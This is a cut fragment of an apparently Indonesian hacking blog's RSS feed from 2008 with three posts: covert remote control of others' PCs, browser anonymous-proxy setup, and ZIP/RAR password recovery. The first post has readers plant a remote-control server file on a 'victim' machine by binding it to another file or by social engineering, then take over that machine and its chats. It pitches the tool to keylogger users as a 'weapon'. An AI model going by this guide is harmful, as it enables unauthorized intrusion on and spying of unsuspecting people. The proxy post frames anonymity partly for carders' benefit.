url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyQGgP6uxbHYbfmmUiGgoYrzLin0EUek_RwZIADfwSsPIiYfRrEL3Vc5AItcHvPGIIaCtbOXF3fWvn1EFpjyOwAkiwyLVCr0ZlWVGmenwQbk0bpt4iGbBwKTvCjYp2GWrD76DDFIF-MaM/s72-c/yahoockeker.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-1997407860214772551</guid><pubDate>Sun, 13 Apr 2008 22:09:00 +0000</pubDate><atom:updated>2009-03-12T20:07:36.414-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Mengontrol PC Orang Lain</title><description>&lt;div align="justify"&gt;Apa yang akan kita bicarakan kali ini sebenarnya sudah menjadi hal yang umum bagi admin jaringan, tapi yang namanya belajar tentunya tidak mengenal hal itu. Yang akan kita bahas ialah bagaimana mengontrol komputer lain secara remote. Disini kita menggunakan &lt;strong&gt;COOL! Remote Control,&lt;/strong&gt; alasan saya memilihnya karena COOL! sangat mudah dioperasikan. Selain itu, bagi para peternak keylogger mungkin ini bisa menjadi salah satu alternatif mengingat memasyarakatnya pengguna freezer yang membuat keylogger tidak bisa berbuat banyak. &lt;/div&gt;&lt;div align="justify"&gt;Tool nya silahkan sedot di &lt;a href="http://rapidshare.com/files/107271807/remote.zip" target="_blank"&gt;http://rapidshare.com/files/107271807/remote.zip&lt;/a&gt;&lt;/div&gt;&lt;div align="justify"&gt;Download dan install lah! Kemudian buka direktori &lt;em&gt;C:\Program Files\COOL!&lt;/em&gt; &lt;em&gt;Remote Control&lt;/em&gt;, disana ada dua buah file aplikasi yaitu RemoteControl dan Remote Server.&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5188864585774396322" style="margin: 0px auto 10px; display: block; width: 555px; height: 312px; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcgmmT_FhXg_QS2gLh3kq6uYHv4Jpf2a6x0b7OjMy8FTAGH6_qgEsKBaUbndBnDaReJ2imnqRxtV_3N6SoWCbCNLYHrBIcU6UeT9UEHvNN-KKUtbYC_1Q-4FdjoE78YlOE02X18sFx3Os/s320/iviewcapture_date_14_04_2008_time_05_44_01.jpg" border="0" height="239" width="471" /&gt;&lt;p align="justify"&gt;File pertama yaitu RemoteControl merupakan aplikasi controler untuk komputer kita sedangkan file yang kedua adalah file connector antara komputer kita dengan korban. File inilah yang harus dikirim kemudian di jalankan di komputer korban. Silahkan anda pikirkan bagaimana caranya agar file RemoteServer ini bisa dijalankan, apakah mau di bungkus oleh file lain (digabungkan) kemudian dikirim ke korban atau gunakan social engineering...teu langkung!&lt;br /&gt;&lt;/p&gt;&lt;div align="justify"&gt;Jalankan program Cool! Screenshootnya seperti ini.&lt;/div&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5188859964389585810" style="margin: 0px auto 10px; display: block; width: 417px; height: 297px; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjufZyHJ5fbFMEuAFlbGU8H0mfgfrjqE2-Ihk9olr0AiRuxgIXXGNdBxDzPaAkfDZKJZpbh_1JlLJMz3x50gHGrAaYorx8l37imC9nPXM16Rcg0X0tMda2XlLGK4uQ3Sszdv3VqMzkTL4A/s320/iviewcapture_date_14_04_2008_time_04_58_18.jpg" border="0" height="230" width="396" /&gt; &lt;p align="justify"&gt;Hal pertama yang harus kita lakukan ialah menghubungkan antara komputer kita dengan komputer korban. Kita asumsikan bahwa kita telah menyimpan dan menjalankan file server di komputer korban. Untuk itu, klik menu &lt;strong&gt;Main-Connect To&lt;/strong&gt; atau gunakan &lt;strong&gt;Ctrl+C&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;img id="BLOGGER_PHOTO_ID_5188867497762223026" style="margin: 0px auto 10px; display: block; width: 376px; height: 190px; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrRpq1szcz6a8tgV6u08r0tflFI0PKlsp7_m4pyOGidT7YNqskG7KqPzAd6fxcNyGswxAhzXP2P_sRYz-4Z9Wf0XPrpGyVB5g0No2ygrtM4Ow4U7Jv-mwS8xpsuF-hRjcnPXj3ZT3h_kc/s320/iviewcapture_date_14_04_2008_time_04_58_26.jpg" border="0" height="172" width="362" /&gt;Isi Ip Address dari komputer korban kemudian klik &lt;strong&gt;OK&lt;/strong&gt;. &lt;div align="justify"&gt;&lt;img id="BLOGGER_PHOTO_ID_5188872707557553122" style="margin: 0px auto 10px; display: block; width: 381px; height: 251px; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7VGvpl9Hnngq3AQbgsEmho-bOXGObVLeQh9_uVOuT4LUUsaUbAfjW4WLBJdjIiK2Ba5Qz4ozzyoD9CgLuFjnBC8YvBA5IrikQouNpLsQHXFpMzjPSZtSdT544i9_7ivwSQqKu4i8cqvw/s320/Untitled-1.jpg" border="0" height="229" width="381" /&gt;&lt;/div&gt;&lt;div align="justify"&gt;Setelah koneksi berhasil, Anda bisa berbuat banyak pada komputer korban termasuk menjawab pesan di chatting.&lt;/div&gt;&lt;div align="justify"&gt;&lt;img id="BLOGGER_PHOTO_ID_5188873927328265202" style="margin: 0px auto 10px; display: block; width: 555px; height: 303px; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgns9-MXOtHcaEN2j1gV1FaZjkRFNtF55ouQc-3jwOtNoKuXRbU5Kj4kvE8PtaPCW6q8K6qgC_eM_pjipXhGUma-jYeqq8FwFt-dbD5VSJi4ysBPtbh-bg5JVYm4Is_sTn1farz9ZX9OYY/s320/iviewcapture_date_13_04_2008_time_10_01_11.jpg" border="0" height="240" width="432" /&gt;Namun ada satu kelemahan dari cool ini yaitu pada saat file server di jalankan dia akan menambahkan satu icon. Perhatikan gambar berikut!&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjykftMeIjkvUbkxiXSwn3JS3aAJCLPyXFj1nBRc4vvuYbr2FpchwqHp5eiJy1HRXQzdTi0vBwu_yT0klE1NWADdjjly6VzI3oucdNj4SzoOe4unU-K1sL-t0oIJhVsAJwot5nThaDwPDw/s1600-h/Untitled-2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjykftMeIjkvUbkxiXSwn3JS3aAJCLPyXFj1nBRc4vvuYbr2FpchwqHp5eiJy1HRXQzdTi0vBwu_yT0klE1NWADdjjly6VzI3oucdNj4SzoOe4unU-K1sL-t0oIJhVsAJwot5nThaDwPDw/s320/Untitled-2.jpg" alt="" id="BLOGGER_PHOTO_ID_5207531408077280226" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Tapi diluar itu, tool ini layak untuk dijadikan salah satu senjata.&lt;br /&gt;&lt;/p&gt;</description><link>http://xpemula.blogspot.com/2008/04/menontrol-pc-orang-lain.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcgmmT_FhXg_QS2gLh3kq6uYHv4Jpf2a6x0b7OjMy8FTAGH6_qgEsKBaUbndBnDaReJ2imnqRxtV_3N6SoWCbCNLYHrBIcU6UeT9UEHvNN-KKUtbYC_1Q-4FdjoE78YlOE02X18sFx3Os/s72-c/iviewcapture_date_14_04_2008_time_05_44_01.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-1570422130746063762</guid><pubDate>Thu, 20 Mar 2008 16:32:00 +0000</pubDate><atom:updated>2009-03-12T20:11:41.891-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Anonymous</title><description>&lt;div align="justify"&gt;Bukan hanya kalangan Hacker atau Carder yang menginginkan kerahasiaan identitasnya tetap terjaga saat ia connect ke internet, tapi kadangkala individu yang bukan dari kelompok keduanyapun menginginkan hal yang sama. &lt;/div&gt;&lt;div align="justify"&gt;Salah satu cara yang bisa dilakukan untuk menghilangkan jejak atau menjaga identitas yaitu dengan menggunakan anonymous proxy. Hal ini mungkin akan menjadi topik yang basi bagi beberapa orang, tapi bagi orang-orang yang belum mengetahuinya, sepertinya akan menjadi informasi yang dapat dipraktekkan.&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;Yang akan saya bahas ialah bagaiamana menggunakan anonymous proxy pada 3 mesin browser yang umum digunakan.&lt;/div&gt;&lt;div align="justify"&gt;Untuk mendapatkan alamat proxy, silahkan hubungi paman google!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-weight: bold;" align="justify"&gt;1. Opera&lt;/div&gt;Pada menu Opera, pilih &lt;strong&gt;ToolsPreference &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5179865899932368066" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik25MAe2NKzWf47dlGn_bSkeeNacaSdHrxke2V3x2vubOUTWdQ26AVMb1enWsriPYj-TkGZe7_5kHHcRVxKB_HvlQc9iIUJ-AfEINLdZXXlnvl0Y5Y_V6iRIOEnnex85F0Qjss1t-uyks/s320/iviewcapture_date_15_03_2008_time_18_05_44.jpg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Setelah itu pilih tab &lt;strong&gt;Advanced &lt;/strong&gt;dan klik menu &lt;strong&gt;Network&lt;/strong&gt; di side bar sebelah kiri.&lt;/p&gt;&lt;img id="BLOGGER_PHOTO_ID_5179866720271121634" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDDANUEkvCQXnnm4tBfA5gXhFYVxUfZzHCM6eWKAVDe2GJpO72RXeh1-sLmqL5uFtNQ2rKgGvcjO3hK2stAfK-c4yMpvgng8kLv2VZMu4Kx77R417phvQzwdVGEl7qZXoH642LwFxphdE/s320/iviewcapture_date_15_03_2008_time_18_07_54.jpg" border="0" /&gt;&lt;br /&gt;Pilih Proxy Server dan masukan alamat proxy beserta Port nya.&lt;br /&gt;&lt;p&gt;&lt;img id="BLOGGER_PHOTO_ID_5179867119703080178" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcp2SSNGnWggzKkLgISWMPXCf554hZioPAMu-flCW8URFli6_cV9gLO1l6vAA5GJ_l5uzr1dRI311eASL_hgNFnsHS-CrthUoh3_2SskPkRq8Z5-NFXe_FtRe4bfdArnivRZP6iVI2Q_g/s320/iviewcapture_date_15_03_2008_time_18_09_01.jpg" border="0" /&gt;Klik Ok.&lt;/p&gt;&lt;span style="font-weight: bold;"&gt;2. Internet Explorer&lt;/span&gt;&lt;br /&gt;Pada menu bar IE pilih &lt;strong&gt;ToolsInternet Options&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwhuRht8HObZZ54jg_pV6KikiTYC3Sw8WcYSvl-8IP57RAL6agaE0P67FcfqIq2E0iMou157EfrbkmUXE1ZqXkw5kvTxcAOuRymfW2wgdNl2skmCTYMk9xnVuLmOkz_gU6AMrvRCAePp8/s1600-h/iviewcapture_date_15_03_2008_time_15_02_23.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181719186910526738" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwhuRht8HObZZ54jg_pV6KikiTYC3Sw8WcYSvl-8IP57RAL6agaE0P67FcfqIq2E0iMou157EfrbkmUXE1ZqXkw5kvTxcAOuRymfW2wgdNl2skmCTYMk9xnVuLmOkz_gU6AMrvRCAePp8/s320/iviewcapture_date_15_03_2008_time_15_02_23.jpg" border="0" /&gt;&lt;/a&gt;kemudian pilih &lt;span style="font-weight: bold;"&gt;Connections&lt;/span&gt; dan lanjutkan ke &lt;span style="font-weight: bold;"&gt;LAN Settings&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV0rW59AcvToGBQbdXr_F2KhhOq386GN-twFXW6jy4WcPGucGPoseHJRvSg81VwbkkKjxaacoUPvGkc5h8K20bgi8P4mgj4qI1bU17gAptWE1Fg1ceouY2IXHLO77TDlThqH8Dah6RMs/s1600-h/iviewcapture_date_15_03_2008_time_15_05_32.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181719805385817378" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV0rW59AcvToGBQbdXr_F2KhhOq386GN-twFXW6jy4WcPGucGPoseHJRvSg81VwbkkKjxaacoUPvGkc5h8K20bgi8P4mgj4qI1bU17gAptWE1Fg1ceouY2IXHLO77TDlThqH8Dah6RMs/s320/iviewcapture_date_15_03_2008_time_15_05_32.jpg" border="0" /&gt;&lt;/a&gt;Klik &lt;span style="font-weight: bold;"&gt;Advanced&lt;/span&gt; seperti pada gambar dibawah ini&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw6MNIfpZBbOnRILRpy3pcTg21GtUJM4GeewNPlAKQ9FhiCHYhIEdJz0EvmhAXbr860Z-_VO0P0taoNtAbDsf4KgFqvDbxDKDLhqwF390EOugdQOc7aySvLWmoKM0-sveCWIRvPBLYf0/s1600-h/iviewcapture_date_15_03_2008_time_15_05_40.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181721373048880434" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw6MNIfpZBbOnRILRpy3pcTg21GtUJM4GeewNPlAKQ9FhiCHYhIEdJz0EvmhAXbr860Z-_VO0P0taoNtAbDsf4KgFqvDbxDKDLhqwF390EOugdQOc7aySvLWmoKM0-sveCWIRvPBLYf0/s320/iviewcapture_date_15_03_2008_time_15_05_40.jpg" border="0" /&gt;&lt;/a&gt;Setelah itu lanjutkan dengan mengisi &lt;span style="font-weight: bold;"&gt;form proxy&lt;/span&gt; dan &lt;span style="font-weight: bold;"&gt;port&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYGmuF_Y3Zrnt_xgibK0KolwEngjkmPhV0nUtHZVGyHyIE6oLOWTXGwf18H3E3er-4YNHI79K0BN94yY8heyqDQD6IgyOzRAM5vEt07EyjKexjRQ19UCC5w_L0P5CFiAZ1cN_aO4F0bww/s1600-h/iviewcapture_date_15_03_2008_time_15_08_01.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181721978639269186" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYGmuF_Y3Zrnt_xgibK0KolwEngjkmPhV0nUtHZVGyHyIE6oLOWTXGwf18H3E3er-4YNHI79K0BN94yY8heyqDQD6IgyOzRAM5vEt07EyjKexjRQ19UCC5w_L0P5CFiAZ1cN_aO4F0bww/s320/iviewcapture_date_15_03_2008_time_15_08_01.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Firefox&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;pada menu bar, klik &lt;span style="font-weight: bold;"&gt;ToolsOptions&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ImZCBO4BeKvXGrhauUa89MeiedR0jjK_plmE0oeSdMrhp4u5Ii77F5E356WCE4_dq3NEnU4YGmGYtPKEG_m0HVUbkAwckplA90dTte2zwJ-zpvtoD3fieo5n9pi0-SLf6A0WONW7x9A/s1600-h/iviewcapture_date_15_03_2008_time_18_01_56+copy.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181726484059962706" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ImZCBO4BeKvXGrhauUa89MeiedR0jjK_plmE0oeSdMrhp4u5Ii77F5E356WCE4_dq3NEnU4YGmGYtPKEG_m0HVUbkAwckplA90dTte2zwJ-zpvtoD3fieo5n9pi0-SLf6A0WONW7x9A/s320/iviewcapture_date_15_03_2008_time_18_01_56+copy.jpg" border="0" /&gt; &lt;/a&gt;&lt;p align="justify"&gt;&lt;br /&gt;klik &lt;span style="font-weight: bold;"&gt;Advanced &lt;/span&gt;kemudian pada bagian &lt;span style="font-weight: bold;"&gt;Network&lt;/span&gt; klik &lt;span style="font-weight: bold;"&gt;Settings, &lt;/span&gt;akan muncul sebuah dialog. Pilihlah Manual Proxy Configuration dan isi form proxy beserta port nya&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigeSyosBn8KZZZXWmGOGXampHNzneSvn5oYPWjUfHegnNPSSu3rKzDb1kVD2LwiIo4h8dQV20B_R5VoFJnItYBAw8BYZ654-KF4IbsNDgtsegkGi-AJ0yI1qB4vpUIHwtoP_06CiastmE/s1600-h/iviewcapture_date_15_03_2008_time_18_04_33.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5181727570686688610" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigeSyosBn8KZZZXWmGOGXampHNzneSvn5oYPWjUfHegnNPSSu3rKzDb1kVD2LwiIo4h8dQV20B_R5VoFJnItYBAw8BYZ654-KF4IbsNDgtsegkGi-AJ0yI1qB4vpUIHwtoP_06CiastmE/s320/iviewcapture_date_15_03_2008_time_18_04_33.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Efek dari penggunaan proxy ini ialah koneksi akan menjadi lebih lambat dari biasanya.&lt;br /&gt;&lt;p&gt; &lt;/p&gt;</description><link>http://xpemula.blogspot.com/2008/03/anonymous.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik25MAe2NKzWf47dlGn_bSkeeNacaSdHrxke2V3x2vubOUTWdQ26AVMb1enWsriPYj-TkGZe7_5kHHcRVxKB_HvlQc9iIUJ-AfEINLdZXXlnvl0Y5Y_V6iRIOEnnex85F0Qjss1t-uyks/s72-c/iviewcapture_date_15_03_2008_time_18_05_44.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-9161532766719626805</guid><pubDate>Fri, 14 Mar 2008 08:54:00 +0000</pubDate><atom:updated>2009-07-08T09:39:30.901-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Recover Pass ZIP and RAR</title><description>&lt;div&gt;&lt;div&gt;&lt;div&gt;&lt;div&gt;&lt;div&gt;&lt;div align="justify"&gt;Keberadaan aplikasi kompresi seperti Winzip dan WinRAR memang cukup membantu, terutama bagi yang memiliki kapasitas disk yang tidak terlalu besar. Zip dan RAR juga memiliki fasilitas proteksi berupa password yang akan melindungi file Anda saat akan di eksekusi ataupun di ekstrak oleh orang yang tidak berhak.&lt;/div&gt;&lt;div align="justify"&gt;Walaupun demikian, kadang proteksi seperti ini bisa menjadi bumerang, saat kita lupa akan password yang digunakan sehingga file tersebut jadi nganggur.&lt;/div&gt;&lt;div align="justify"&gt;Sebenarnya banyak sekali tool yang bisa digunakan untuk merecover password zip dan RAR. Tapi kali ini yang akan kita bahas hanya ZIP Password Finder dan RAR password Recovery.&lt;/div&gt;&lt;br /&gt;&lt;div&gt; &lt;/div&gt;&lt;div align="justify"&gt;&lt;strong&gt;1. ZIP Password Finder &lt;/strong&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Download aplikasi nya di &lt;a href="http://www.astonsoft.com/"&gt;http://www.astonsoft.com/&lt;/a&gt; atau Anda bisa menyedot langsung dari &lt;/div&gt;&lt;div&gt;&lt;a href="http://rapidshare.com/files/98958335/Zip_Recovery_pass.zip"&gt;http://rapidshare.com/files/98958335/Zip_Recovery_pass.zip&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Setelah Anda mendownload, Install program tersebut dan jalankan.&lt;br /&gt;Tampilan awalnya seperti ini:&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177526546719724898" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaepmzMSQbYDPTr6wK3zVHKEK_JNORu1YUSLfsiMD5tt7cX0T2kh4mlp35ayX8SCjSbQV6xQgVUm54A8vXHa0H7Tgw5PkmySe1NlOPNbCanIArAehpNtTsGa5AzItJ1aK15koCeulyTxs/s320/iviewcapture_date_14_03_2008_time_16_12_44.jpg" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;kemudian klik open file&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;img id="BLOGGER_PHOTO_ID_5177527019166127474" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMF1t012KcL2IvinRsLWAlob1XPpJ41VrpoVcMBwIU2ojlx-5tZitimqNVcoyl3pmWesoTHf7FI_iCXSnKJNFaJnm_-qSR_r2mMf0vMjKr_hQFAFWHn358zvAb_CvbWH0BKWXANShinZY/s320/iviewcapture_date_14_03_2008_time_16_12_53.jpg" border="0" /&gt;&lt;/p&gt;&lt;div&gt;kemudian pilihlah file yang akan anda cari password nya&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177527779375338882" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwzD9VuuzK8-3y8jkIZKSpKY0ij5LxI5Bkmx_nc65okAC5M2ZoTx1agmQFP9BXiQ9rdHBw1XZ6pODO3QwEpLLLLegYbHAdBROGOnexUgCamFT1vW2CvFlspO5EVkDrK_cGbrSQAXIbfyM/s320/iviewcapture_date_14_03_2008_time_16_16_41.jpg" border="0" /&gt; Setelah itu klik &lt;strong&gt;Start&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5177528165922395538" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ZqGHj8xxaUzX3hrTgkEp5BOvTuSE2_l9Dyj5Ha9fXhZOolFM66w1Uwzl4WQ_0HCI597s9wh7P2vBlMx3IsVTCnlg8DhTZRUXssiz8OSD4y7BxllBvK_ssKzPpKz6RDvbcFhtjovPsRw/s320/iviewcapture_date_14_03_2008_time_16_13_15.jpg" border="0" /&gt;Proses ini mungkin membutuhkan waktu yang cukup lama. Sementara menunggu Anda bisa mengerjakan hal lainnya&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;strong&gt;2. RAR password Recovery&lt;/strong&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Silahkan download program nya di :&lt;/div&gt;&lt;div&gt;&lt;a href="http://rapidshare.com/files/98958334/RAR_Recovery_pass.rar"&gt;http://rapidshare.com/files/98958334/RAR_Recovery_pass.rar&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;kemudian install program tersebut dan jalankan&lt;/div&gt;&lt;div&gt;tampilan awalnya seperti ini:&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177529054980625826" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiKUzab65oszYeuuoSKWDGaGGrfEilwfxyIhSaTgGw3UYaw3Tx9SwKy3VnYA3orlZF0_XCOSeLhqokVse49pcyZIGmD6S0kWESi3YyOETqhBzs_j-JfDrxMpaUnfA282xKvoHRtV4HexU/s320/iviewcapture_date_14_03_2008_time_16_16_31.jpg" border="0" /&gt;&lt;br /&gt;&lt;p&gt;klik open untuk browsing file yang akan Anda cari passwordnya&lt;/p&gt;&lt;img id="BLOGGER_PHOTO_ID_5177529389988074930" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioIggyg8CIqrFxrAtqVjsF6ApFhKXgnkRnjgTJxrs5M-PSIbIKOyo0XEtrHZr1N7VvunVHW8LZO_zmrqdNWvIFZHtFh-1VzCuntzjKmYzWR8Rk-VKE7Hknrz8t37YnflDYI5DOJ1RdUTE/s320/iviewcapture_date_14_03_2008_time_16_16_36.jpg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;pilihlah file yang Anda maksud&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177529660571014594" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7-RhSJQh8WmWX5n-sFvElWUa984tnbEBl6Avgct8pkEZewhRUn3jYiD-4mZ5qHpU8KunMmEs9uWhpmPFsN509r_ITkUpzGe3HuI6UaqQNqb6htU_e7uyTGbQukRkr7BoKGqmtv7rmHSA/s320/iviewcapture_date_14_03_2008_time_16_16_41.jpg" border="0" /&gt;&lt;/div&gt;&lt;div&gt;karena ini versi Trial, klik lah &lt;strong&gt;I want to try RAR Password Recovery before I buy it&lt;/strong&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177530605463819746" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwCPZ4bhixoon_HEa6-nx6hF8VxFZk53Gvb_V1hqB_xzf4PuVL0SyzH6tA45Pay9BRe0yJJWBFFt_i0-XtZ8Hwgy7d48FNyLTnfMA2PIKAk3TH4MxvYUUsf_F7N1sZ0tMML2nQ55cpCnk/s320/iviewcapture_date_14_03_2008_time_16_16_47.jpg" border="0" /&gt;&lt;br /&gt;kemudian klik start&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5177530279046305234" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh5p4-p-hGcSgu7SMRqau9omTYu8D1IbX9PB39hMM9YekNaWGJch374QF-UEWuYkJbQxp6h06jOJ98fMOwk5K0Ls3WxojkSRA-LSSRMmT2XrYSlJcww9zSiU_PAMIldZAQEiEFF20qdwg/s320/iviewcapture_date_14_03_2008_time_16_16_57.jpg" border="0" /&gt;&lt;br /&gt;Setelah selesai prcessing akan muncul hasilnya&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5177530996305843698" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdR4Z87LSLynmzmjBDO5ID8hqXo2-_t6NeZy72iA_faMRPwCnMZW3CLr8qjkTssc74kIqz-XJYBYJ3BQJJYINVd6jzpjWAFYrXxQjkFwZAoMbhnPHWJW_oikvoSnY4_DjMR0jzZY3-ylk/s320/iviewcapture_date_14_03_2008_time_16_17_07.jpg" border="0" /&gt;Dalam contoh ini password yang diperoleh ialah &lt;em&gt;ibm&lt;br /&gt;&lt;/em&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://xpemula.blogspot.com/2008/03/recover-pass-zip-and-rar.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" 